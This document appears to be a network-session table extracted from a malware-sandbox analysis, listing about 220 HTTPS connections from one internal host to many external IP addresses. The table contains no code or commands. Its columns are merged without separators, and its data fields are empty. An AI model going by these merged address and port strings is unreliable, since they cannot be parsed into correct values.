                                      11001192.168.2.1454790199.140.250.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11002192.168.2.1448238177.253.34.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11003192.168.2.14336385.43.17.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11004192.168.2.1434998139.191.134.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11005192.168.2.145178446.215.180.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11006192.168.2.144710024.104.180.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11007192.168.2.14513081.197.46.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11008192.168.2.1448780213.20.84.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11009192.168.2.1460090165.170.233.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11010192.168.2.143404265.154.54.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11011192.168.2.1440886216.74.224.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11012192.168.2.144605260.196.134.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11013192.168.2.1453122132.13.125.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11014192.168.2.143961058.160.42.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11015192.168.2.145031644.76.242.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11016192.168.2.145782265.175.154.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11017192.168.2.1438184223.124.204.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11018192.168.2.14345125.88.38.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11019192.168.2.1450406160.19.139.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11020192.168.2.1442252163.233.161.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11021192.168.2.1444324126.139.12.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11022192.168.2.144051443.132.16.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11023192.168.2.145902419.79.95.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11024192.168.2.144652835.62.229.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11025192.168.2.1436080147.212.2.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11026192.168.2.143931632.210.157.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11027192.168.2.145689019.168.239.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11028192.168.2.14495588.94.189.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11029192.168.2.1453634103.239.15.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11030192.168.2.1457948159.29.132.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11031192.168.2.144832689.136.199.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11032192.168.2.1460884198.247.148.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11033192.168.2.1435686128.104.125.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11034192.168.2.143421491.164.134.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11035192.168.2.1435776221.206.185.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11036192.168.2.1433168124.70.228.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11037192.168.2.1437412166.191.207.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11038192.168.2.1451272130.5.253.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11039192.168.2.1457856126.122.129.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11040192.168.2.1433498126.28.218.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11041192.168.2.1435084156.193.93.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11042192.168.2.143745277.231.23.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11043192.168.2.1446914159.217.65.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11044192.168.2.1433570186.23.158.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11045192.168.2.1444318166.238.61.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11046192.168.2.145899498.48.205.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11047192.168.2.144187096.83.23.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11048192.168.2.145848427.44.244.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11049192.168.2.1439396139.42.223.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11050192.168.2.143671066.226.23.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11051192.168.2.1453602145.83.13.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11052192.168.2.1449466152.181.174.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11053192.168.2.14543925.209.43.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11054192.168.2.145855663.147.171.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11055192.168.2.145215099.145.61.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11056192.168.2.1435360196.191.18.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11057192.168.2.1450124152.93.212.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11058192.168.2.143595637.174.199.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11059192.168.2.144804645.9.251.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11060192.168.2.1442798200.43.126.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11061192.168.2.143471239.201.240.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11062192.168.2.14335362.104.145.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11063192.168.2.1442728111.210.98.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11064192.168.2.144861637.149.93.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11065192.168.2.143682634.204.237.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11066192.168.2.144908859.194.38.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11067192.168.2.1452458107.122.84.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11068192.168.2.1451260145.218.220.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11069192.168.2.1437120184.251.103.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11070192.168.2.1435264164.38.37.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11071192.168.2.145703612.136.200.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11072192.168.2.1448448172.181.77.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11073192.168.2.145671864.47.105.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11074192.168.2.145974862.234.154.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11075192.168.2.1433950204.195.20.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11076192.168.2.1437252205.177.93.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11077192.168.2.1438794120.247.255.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11078192.168.2.1444840109.233.80.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11079192.168.2.1438062200.170.130.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11080192.168.2.144137493.161.2.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11081192.168.2.1447902113.3.159.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11082192.168.2.144556440.44.219.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11083192.168.2.1441208109.233.114.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11084192.168.2.145599887.204.223.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11085192.168.2.143579267.131.73.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11086192.168.2.1442052156.191.192.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11087192.168.2.1433478217.185.99.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11088192.168.2.1447310209.153.55.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11089192.168.2.1449374158.202.15.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11090192.168.2.1447392179.139.237.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11091192.168.2.144588698.234.64.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11092192.168.2.143839462.26.254.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11093192.168.2.1443244187.74.95.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11094192.168.2.14459388.60.170.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11095192.168.2.144774288.67.246.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11096192.168.2.1460136185.26.137.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11097192.168.2.145133268.219.231.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11098192.168.2.1456264212.99.207.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11099192.168.2.1433414188.118.160.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11100192.168.2.143840082.59.21.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11101192.168.2.1456422143.85.207.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11102192.168.2.145651672.242.59.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11103192.168.2.145170467.78.198.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11104192.168.2.14552408.246.136.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11105192.168.2.1450252180.31.168.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11106192.168.2.1455840136.161.156.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11107192.168.2.1454916194.102.184.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11108192.168.2.144039854.5.4.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11109192.168.2.1448968204.229.91.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11110192.168.2.1434614122.106.85.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11111192.168.2.1459076120.69.13.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11112192.168.2.146060692.84.111.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11113192.168.2.144823253.231.173.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11114192.168.2.1447494123.232.186.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11115192.168.2.144927872.45.60.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11116192.168.2.1437224134.171.221.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11117192.168.2.1455524196.55.36.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11118192.168.2.1435882212.132.54.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11119192.168.2.146013480.157.52.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11120192.168.2.1450048174.132.90.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11121192.168.2.145471039.134.159.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11122192.168.2.1460786132.1.216.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11123192.168.2.1450312106.155.149.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11124192.168.2.1459672201.36.156.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11125192.168.2.1435210219.53.222.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11126192.168.2.1439642165.64.249.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11127192.168.2.143502239.247.95.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11128192.168.2.145133681.183.196.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11129192.168.2.1460788167.14.155.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11130192.168.2.145554475.64.21.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11131192.168.2.1435466155.75.107.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11132192.168.2.1440022203.186.219.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11133192.168.2.1434002200.139.162.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11134192.168.2.1438380146.28.212.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11135192.168.2.1438772123.251.20.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11136192.168.2.145853637.206.63.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11137192.168.2.1456162168.186.13.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11138192.168.2.1460570169.44.136.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11139192.168.2.1434702180.128.220.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11140192.168.2.1448956116.98.221.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11141192.168.2.143692848.32.192.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11142192.168.2.1440698121.24.61.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11143192.168.2.1453486178.128.210.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11144192.168.2.143277894.195.6.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11145192.168.2.1444394199.181.17.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11146192.168.2.145839294.109.118.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11147192.168.2.143345266.71.139.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11148192.168.2.1434066102.32.34.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11149192.168.2.1453644179.168.199.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11150192.168.2.1433552151.38.214.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11151192.168.2.145860666.103.157.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11152192.168.2.1456326105.246.91.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11153192.168.2.1440182125.42.193.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11154192.168.2.1450726189.28.33.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11155192.168.2.144510853.156.105.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11156192.168.2.1445610117.153.22.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11157192.168.2.144710665.245.102.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11158192.168.2.1445062100.193.231.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11159192.168.2.143648299.153.81.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11160192.168.2.145543840.158.6.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11161192.168.2.1445060167.113.115.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11162192.168.2.1450622165.138.135.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11163192.168.2.1444638202.216.70.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11164192.168.2.1443190133.212.59.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11165192.168.2.1434316168.138.156.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11166192.168.2.143955257.48.89.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11167192.168.2.1454076222.33.4.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11168192.168.2.1451980171.126.237.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11169192.168.2.144214232.155.222.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11170192.168.2.1447810172.230.235.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11171192.168.2.1447748166.154.229.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11172192.168.2.144625436.54.4.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11173192.168.2.1436992113.137.149.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11174192.168.2.143557085.21.117.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11175192.168.2.1450832147.127.82.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11176192.168.2.1457874137.83.184.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11177192.168.2.1458746177.36.50.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11178192.168.2.1448294135.247.151.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11179192.168.2.1439720200.167.24.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11180192.168.2.1439368178.63.69.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11181192.168.2.1452170151.61.246.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11182192.168.2.143318027.39.201.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11183192.168.2.1442658130.196.141.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11184192.168.2.14598925.206.41.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11185192.168.2.143527462.167.69.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11186192.168.2.143894453.89.36.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11187192.168.2.1447872176.237.234.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11188192.168.2.144740671.157.77.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11189192.168.2.143959235.17.125.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11190192.168.2.145064224.151.15.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11191192.168.2.1460194160.119.134.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11192192.168.2.1437842134.94.240.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11193192.168.2.1456638221.250.73.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11194192.168.2.143281688.40.232.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11195192.168.2.1456452175.71.185.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11196192.168.2.1459702107.79.190.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11197192.168.2.1455410166.180.106.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11198192.168.2.144456620.205.180.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11199192.168.2.1442738103.187.146.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11200192.168.2.1440338101.9.119.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11201192.168.2.1434612218.79.0.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11202192.168.2.1455078217.19.115.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11203192.168.2.143547898.62.43.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11204192.168.2.144574861.254.33.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11205192.168.2.1454246192.85.57.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11206192.168.2.1444384113.15.64.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11207192.168.2.1455606136.46.97.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11208192.168.2.145125819.92.59.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11209192.168.2.144939494.162.74.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11210192.168.2.1445890150.77.153.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11211192.168.2.1443238164.216.206.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11212192.168.2.1439986121.13.20.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11213192.168.2.1450800125.134.147.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11214192.168.2.1435840111.81.129.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11215192.168.2.145269442.202.21.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11216192.168.2.144619636.179.100.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11217192.168.2.14393748.198.21.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11218192.168.2.1452652142.166.60.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11219192.168.2.143301825.6.109.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11220192.168.2.144770423.135.184.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11221192.168.2.144275443.26.139.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11222192.168.2.143755817.75.218.20443
                                      TimestampBytes transferredDirectionData


